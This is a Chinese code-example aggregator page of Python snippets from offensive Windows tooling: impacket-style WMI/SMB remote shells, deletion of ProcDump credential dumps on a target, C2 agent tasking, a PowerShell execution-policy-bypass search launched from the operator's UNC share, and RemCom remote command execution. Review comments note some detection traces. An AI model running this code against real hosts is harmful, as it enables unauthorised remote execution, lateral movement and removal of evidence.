本文整理汇总了Python中cmd.exe方法的典型用法代码示例。如果您正苦于以下问题:Python cmd.exe方法的具体用法?Python cmd.exe怎么用?Python cmd.exe使用的例子?那么, 这里精选的方法代码示例或许可以为您提供帮助。您也可以进一步了解该方法所在类cmd的用法示例。
在下文中一共展示了cmd.exe方法的10个代码示例,这些例子默认根据受欢迎程度排序。您可以为喜欢或者感觉有用的代码点赞,您的评价将有助于系统推荐出更棒的Python代码示例。
示例1: __init__
# 需要导入模块: import cmd [as 别名]
# 或者: from cmd import exe [as 别名]
def __init__(self, share, win32Process, smbConnection):
    """Initialise the interpreter state and, if present, the transfer client.

    Args:
        share: Stored unchanged; not otherwise used in this method.
        win32Process: Stored unchanged; presumably the remote process-creation
            object that commands are launched through (confirm against caller).
        smbConnection: Stored as the transfer client. When it is None the
            instance is flagged as producing no output.
    """
    cmd.Cmd.__init__(self)

    # Handles supplied by the caller.
    self.__share = share
    self.__win32Process = win32Process
    self.__transferClient = smbConnection

    # Output bookkeeping: the file name comes from a module-level constant.
    self.__output = '\\' + OUTPUT_FILENAME
    self.__outputBuffer = str('')
    self.__noOutput = False

    # /Q turns echo off, /c runs one command string and exits. Presumably this
    # prefix is prepended to every command elsewhere in the class, which makes
    # it the string process-creation logging on the target would record.
    self.__shell = 'cmd.exe /Q /c '
    self.__pwd = str('C:\\')
    self.intro = '[!] Launching semi-interactive shell - Careful what you execute\n[!] Press help for extra shell commands'

    if self.__transferClient is None:
        # Nothing to read results back through.
        self.__noOutput = True
        return

    # We don't wanna deal with timeouts from now on.
    self.__transferClient.setTimeout(1000000)
    self.do_cd('\\')
示例2: __init__
# 需要导入模块: import cmd [as 别名]
# 或者: from cmd import exe [as 别名]
def __init__(self, share, win32Process, smbConnection):
    """Set up shell state; configure the transfer client when one is supplied.

    Args:
        share: Kept on the instance as-is.
        win32Process: Kept on the instance as-is; presumably the object used
            to create remote processes (verify against the caller).
        smbConnection: Kept as the transfer client, or None to mark the
            instance as having no output channel.
    """
    cmd.Cmd.__init__(self)

    self.__transferClient = smbConnection
    self.__win32Process = win32Process
    self.__share = share

    self.__pwd = 'C:\\'
    # Echo off (/Q), run a single command and exit (/c).
    self.__shell = 'cmd.exe /Q /c '
    self.__output = '\\' + OUTPUT_FILENAME
    self.__outputBuffer = ''
    self.__noOutput = False
    self.intro = '[!] Launching semi-interactive shell - Careful what you execute'

    has_transfer_client = self.__transferClient is not None
    if not has_transfer_client:
        self.__noOutput = True
    else:
        # We don't wanna deal with timeouts from now on.
        self.__transferClient.setTimeout(100000)
        self.do_cd('\\')
示例3: __init__
# 需要导入模块: import cmd [as 别名]
# 或者: from cmd import exe [as 别名]
def __init__(self, share, win32Process, smbConnection, disp_output=True):
    """Prepare the shell state and remember whether output should be shown.

    Args:
        share: Stored unchanged.
        win32Process: Stored unchanged; presumably the remote process-creation
            object (confirm against the caller).
        smbConnection: Stored as the transfer client; None means the instance
            is flagged as having no output.
        disp_output: Stored unchanged; how it is consumed is not visible here.
    """
    cmd.Cmd.__init__(self)

    # Caller-supplied values.
    self.__share = share
    self.__win32Process = win32Process
    self.__transferClient = smbConnection
    self.__disp_output = disp_output

    # Fixed defaults.
    self.__output = '\\' + OUTPUT_FILENAME
    self.__outputBuffer = ''
    self.__shell = 'cmd.exe /Q /c '  # /Q: no echo, /c: run the command then exit
    self.__pwd = 'C:\\'
    self.__noOutput = False
    self.intro = '[!] Launching semi-interactive shell - Careful what you execute\n[!] Press help for extra shell commands'

    if self.__transferClient is None:
        self.__noOutput = True
        return

    # We don't wanna deal with timeouts from now on.
    self.__transferClient.setTimeout(100000)
    self.do_cd('\\')
示例4: __init__
# 需要导入模块: import cmd [as 别名]
# 或者: from cmd import exe [as 别名]
def __init__(self, share, win32Process, smbConnection):
    """Build the initial shell state around the supplied connection objects.

    Args:
        share: Saved on the instance without modification.
        win32Process: Saved on the instance without modification; presumably
            the handle used to start remote processes (verify against caller).
        smbConnection: Saved as the transfer client. With None, the no-output
            flag is set instead of configuring a timeout.
    """
    cmd.Cmd.__init__(self)

    self.__share = share
    self.__output = '\\' + OUTPUT_FILENAME
    self.__outputBuffer = str('')

    # Command prefix: /Q suppresses echo, /c executes the string and terminates.
    self.__shell = 'cmd.exe /Q /c '

    self.__win32Process = win32Process
    self.__transferClient = smbConnection
    self.__pwd = str('C:\\')
    self.__noOutput = False
    self.intro = '[!] Launching semi-interactive shell - Careful what you execute\n[!] Press help for extra shell commands'

    transfer_client = self.__transferClient
    if transfer_client is None:
        self.__noOutput = True
    else:
        # We don't wanna deal with timeouts from now on.
        transfer_client.setTimeout(100000)
        self.do_cd('\\')
示例5: __init__
# 需要导入模块: import cmd [as 别名]
# 或者: from cmd import exe [as 别名]
def __init__(self, share, win32Process, smbConnection):
    """Initialise shell state; output is placed under ``\\Windows\\Temp\\``.

    Args:
        share: Stored unchanged.
        win32Process: Stored unchanged; presumably the remote process-creation
            object (confirm against the caller).
        smbConnection: Stored as the transfer client, or None to flag the
            instance as producing no output.
    """
    cmd.Cmd.__init__(self)

    self.__share = share
    self.__win32Process = win32Process
    self.__transferClient = smbConnection

    # The output path is fixed apart from the module-level file name, so the
    # file always lands in the Windows temp directory on the share.
    self.__output = '\\Windows\\Temp\\' + OUTPUT_FILENAME
    self.__outputBuffer = ''
    self.__noOutput = False

    self.__shell = 'cmd.exe /Q /c '  # /Q: echo off, /c: run once and exit
    self.__pwd = 'C:\\'
    self.intro = '[!] Launching semi-interactive shell - Careful what you execute\n[!] Press help for extra shell commands'

    if self.__transferClient is None:
        self.__noOutput = True
        return

    # We don't wanna deal with timeouts from now on.
    self.__transferClient.setTimeout(10000)
    self.do_cd('\\')
示例6: __init__
# 需要导入模块: import cmd [as 别名]
# 或者: from cmd import exe [as 别名]
def __init__(self, share, win32Process, smbConnection):
    """Initialise shell state, keeping buffer and path as ``unicode`` objects.

    The use of the ``unicode`` builtin means this variant targets Python 2.

    Args:
        share: Stored unchanged.
        win32Process: Stored unchanged; presumably the remote process-creation
            object (confirm against the caller).
        smbConnection: Stored as the transfer client; None flags the instance
            as producing no output.
    """
    cmd.Cmd.__init__(self)

    # Connection-related state.
    self.__share = share
    self.__win32Process = win32Process
    self.__transferClient = smbConnection

    # Text state.
    self.__output = '\\' + OUTPUT_FILENAME
    self.__outputBuffer = unicode('')
    self.__pwd = unicode('C:\\')
    self.__shell = 'cmd.exe /Q /c '  # echo off, run one command, exit
    self.__noOutput = False
    self.intro = '[!] Launching semi-interactive shell - Careful what you execute\n[!] Press help for extra shell commands'

    no_transfer_client = self.__transferClient is None
    if no_transfer_client:
        self.__noOutput = True
    else:
        # We don't wanna deal with timeouts from now on.
        self.__transferClient.setTimeout(100000)
        self.do_cd('\\')
示例7: run
# 需要导入模块: import cmd [as 别名]
# 或者: from cmd import exe [as 别名]
def run(self, addr, osArch='64'):
    """Open a DCOM/WMI session to ``addr`` and delete leftover files there.

    Two ``del`` commands are issued through a RemoteShell: one for
    ``procdump<osArch>.exe`` and one for ``SPRAY_*.dmp``. The SMB session (if
    any) and the DCOM connection are always closed afterwards.

    Args:
        addr: Host passed to DCOMConnection and used in the log messages.
        osArch: Suffix inserted into the ProcDump file name.
    """
    dcom = DCOMConnection(
        addr, self.__username, self.__password, self.__domain,
        self.__lmhash, self.__nthash, self.__aesKey,
        oxidResolver=True, doKerberos=self.__doKerberos, kdcHost=self.__kdcHost,
    )

    def run_remote(remote_cmd):
        # 10 is the numeric value of DEBUG in the standard logging module:
        # shell output is shown only when the root logger is at DEBUG or lower.
        if logging.getLogger().getEffectiveLevel() > 10:
            with suppress_std():
                self.shell.onecmd(remote_cmd)
        else:
            self.shell.onecmd(remote_cmd)

    try:
        iInterface = dcom.CoCreateInstanceEx(wmi.CLSID_WbemLevel1Login, wmi.IID_IWbemLevel1Login)
        iWbemLevel1Login = wmi.IWbemLevel1Login(iInterface)
        iWbemServices = iWbemLevel1Login.NTLMLogin('//./root/cimv2', NULL, NULL)
        iWbemLevel1Login.RemRelease()

        win32Process, _ = iWbemServices.GetObject('Win32_Process')
        self.shell = RemoteShell(self.__share, win32Process, self.__smbConnection)

        # NOTE(review): removing these files does not remove the remote logon
        # and process-creation records on the target; those remain the place
        # to look when this activity has to be investigated.
        cleanup_steps = (
            # Delete Procdump
            ("del procdump%s.exe" % (osArch), "%s Deleting ProcDump on %s..."),
            # Delete Dumps
            ("del SPRAY_*.dmp", "%s Deleting dumps on %s..."),
        )
        for remote_cmd, message in cleanup_steps:
            logging.info(message % (debugBlue, addr))
            run_remote(remote_cmd)
    finally:
        if self.__smbConnection is not None:
            self.__smbConnection.logoff()
        dcom.disconnect()
        sys.stdout.flush()
示例8: do_cli
# 需要导入模块: import cmd [as 别名]
# 或者: from cmd import exe [as 别名]
def do_cli(self, args):
    """Switches to the CLI command mode to task current agent with some CLI commands (cmd.exe)"""
    # The docstring is kept verbatim: on a do_* handler it is presumably what
    # the interpreter prints as help text, so it is runtime output.
    # Python 2 code (raw_input). ``args`` is not used.
    if not self.currentAgentID:
        print(helpers.color("[!] No agent selected.\nUse the 'list' command to get the list of available agents, then 'use' to select one"))
        return

    for banner in ("[*] Switching to CLI mode", "[*] Use the command 'back' to exit CLI mode"):
        print(helpers.color(banner))

    while True:
        cli = raw_input("[{}-cli]#> ".format(self.currentAgentID))

        # Empty input: just prompt again.
        if not cli:
            continue
        if cli == 'back':
            return

        # Wire format: base64("cli") + "|" + base64(<typed line>).
        verb = helpers.b64encode('cli')
        payload = helpers.b64encode(cli)
        request = verb + '|' + payload

        # Send message to the main thread for dispatching
        self.c2mQueue.put({'type': 'request', 'value': request})

        # Wait for main thread's answer, block until we get an answer
        response = self.m2cQueue.get()
        kind = response['type']
        if kind == 'response':
            print(helpers.b64decode(response['value']))
        elif kind == 'disconnected':
            # The agent is gone: reset the prompt and leave CLI mode.
            self.prompt = "[no agent]#> "
            self.currentAgentID = None
            return
#------------------------------------------------------------------------------------
示例9: start_file_search
# 需要导入模块: import cmd [as 别名]
# 或者: from cmd import exe [as 别名]
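def start_file_search(self, host, pattern, share, search_path):
    """Start a background content search on ``host`` and record it as a job.

    A one-line batch file is written locally under ``PSUTIL_DIR``; the remote
    host is then told to run it from the ``PSUTIL_SHARE`` share of this
    machine. Results are redirected to ``<tmp_dir>\\<job_name>.txt`` on the
    remote host.

    Args:
        host: Remote host the commands are executed on.
        pattern: Text handed to ``Select-String -Pattern``.
        share: Share passed through to ``exec_command``/``get_job_procid``.
        search_path: Directory handed to ``Get-ChildItem``.

    Any exception is caught and reported with a generic failure message; the
    underlying cause is not shown.
    """
    try:
        myIPaddr = self.get_ip_address()
        job_name = uuid.uuid4().hex
        tmp_dir = self.exec_command(host, share, 'echo %TEMP%', disp_output=False).strip()
        if len(tmp_dir) == 0:
            tmp_dir = 'C:\\Windows\\Temp'

        # Backslashes are written as '\\' so the literals no longer rely on
        # invalid escape sequences ('\*', '\{'), which newer Python versions
        # warn about; the resulting strings are unchanged.
        # NOTE(review): pattern and search_path are interpolated unescaped, so
        # a quote character in either one breaks the generated command line.
        # NOTE(review): the host-side footprint is a PowerShell process started
        # with '-ExecutionPolicy bypass', a .bat launched from a UNC path, and
        # a <job_name>.txt file in the temp directory.
        tmp_bat_cmd = 'powershell -NoLogo -ExecutionPolicy bypass -Command " & {}Get-ChildItem {}\\*.* -Recurse -Exclude *.dll,*.exe,*.msi,*.jpg,*.gif,*.bmp,*.png,*.mp3,*.wav | Select-String -Pattern \'{}\' | Select-Object -Unique Path | out-string -width 220{}" 2>nul > {}\\{}.txt'.format('{', search_path, pattern, '}', tmp_dir, job_name)

        # 'with' closes the file even when the write fails.
        with open('./{}/{}.bat'.format(PSUTIL_DIR, job_name), 'w') as tmp_bat:
            tmp_bat.write(tmp_bat_cmd)

        ps_command = 'powershell -ExecutionPolicy bypass -NoLogo -command "Start-Process """cmd.exe""" """/c \\\\{}\\{}\\{}.bat""" "'.format(myIPaddr, PSUTIL_SHARE, job_name)
        self.exec_command(host, share, ps_command, disp_output=False)
        print('[+] Job {} started on {}, result will be stored at {}\\{}.txt'.format(job_name, host, tmp_dir, job_name))

        proc_id = self.get_job_procid(host, share, tmp_dir, job_name)
        if len(proc_id) > 0:
            proc_id = [j.strip() for j in proc_id.split('\n') if len(j) > 0]
            # NOTE(review): the listing lost its indentation; the job is
            # assumed to be recorded only when a process id came back.
            self.jobs[job_name] = {
                'host': host,
                'share': share,
                'tmp': tmp_dir,
                'pattern': pattern,
                'start_time': time.perf_counter(),
                'proc_id': proc_id,
            }
    except Exception:
        sys.stdout.flush()
        print('[!] Job creation failed on host: %s. Did you run as r00t?' % (host))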
示例10: execute
# 需要导入模块: import cmd [as 别名]
# 或者: from cmd import exe [as 别名]
def execute(self, command, useDrive=False):
    """Run ``command`` through the RemCom service and return its stdout.

    The command is wrapped in ``cmd.exe /C``, sent over the service's named
    pipe, and the three per-process std pipes are opened to collect output.

    Args:
        command: Command line to run; logged at DEBUG level in full.
        useDrive: When true the working directory is ``<self.drive>:\\``,
            otherwise ``\\``.

    Returns:
        The captured stdout with a leading CRLF (if present) and the last two
        characters removed. Errors are logged and nothing is returned.
    """
    try:
        # NOTE(review): assert is stripped when Python runs with -O.
        assert (self.__service is not None)

        # Connect to the IPC tree and open RemComSvc exchange pipe
        tid = self.__smbconnection.connectTree('IPC$')
        fid = self.__openNamedPipe(tid, '\RemCom_communicaton', 0x12019f)

        # Build packet
        packet = RemComMessage()
        local_pid = os.getpid()
        alphabet = 'ABCDEFGHIJKLMNOPRSTUVWXYZabcdefghijklmnoprsqtuvwxyz'
        command = 'cmd.exe /C ' + command
        packet['Machine'] = ''.join(random.choice(alphabet) for _ in range(4))
        if useDrive:
            packet['WorkingDir'] = '%s:\\' % self.drive
        else:
            packet['WorkingDir'] = '\\'
        packet['Priority'] = PRIORITY_NORMAL
        packet['Command'] = command.encode('utf-8')
        packet['ProcessID'] = local_pid

        # Send it along with the command
        self.__log__(logging.DEBUG, 'Executing command: "' + command + '" with priority ' + str(PRIORITY_NORMAL))
        self.__smbconnection.writeNamedPipe(tid, fid, str(packet))

        # Opens the STD pipes
        cred = self.__smbconnection.getCredentials()
        host = self.__smbconnection.getRemoteHost()
        port = 445

        def pipe_name(prefix):
            # Fixed 'RemCom_' prefix + 4 random letters + local process id;
            # these are the names named-pipe auditing on the target would show.
            return '\%s%s%d' % (prefix, packet['Machine'], packet['ProcessID'])

        stdin_pipe = pipes.RemoteStdInPipe(host, port, cred, pipe_name('RemCom_stdin'), FILE_WRITE_DATA | FILE_APPEND_DATA, self.__writableShare)
        stdin_pipe.start()
        stdout_pipe = pipes.RemoteStdOutPipe(host, port, cred, pipe_name('RemCom_stdout'), FILE_READ_DATA)
        stdout_pipe.start()
        stderr_pipe = pipes.RemoteStdErrPipe(host, port, cred, pipe_name('RemCom_stderr'), FILE_READ_DATA)
        stderr_pipe.start()

        # Should be hanging till the command is completed
        self.__smbconnection.readNamedPipe(tid, fid, 8)

        # get stdout
        captured = stdout_pipe.out

        # Close the pipes
        for std_pipe in (stdin_pipe, stdout_pipe, stderr_pipe):
            std_pipe.stop()

        # Yeah, it can happen, dunno why.
        if captured[:2] == '\x0d\x0a':
            captured = captured[2:]

        # Most commands return an additional line. See if keeping it is useful
        return captured[:-2]
    except Exception as e:
        self.__log__(logging.ERROR, 'Error during command execution', e)
# File operations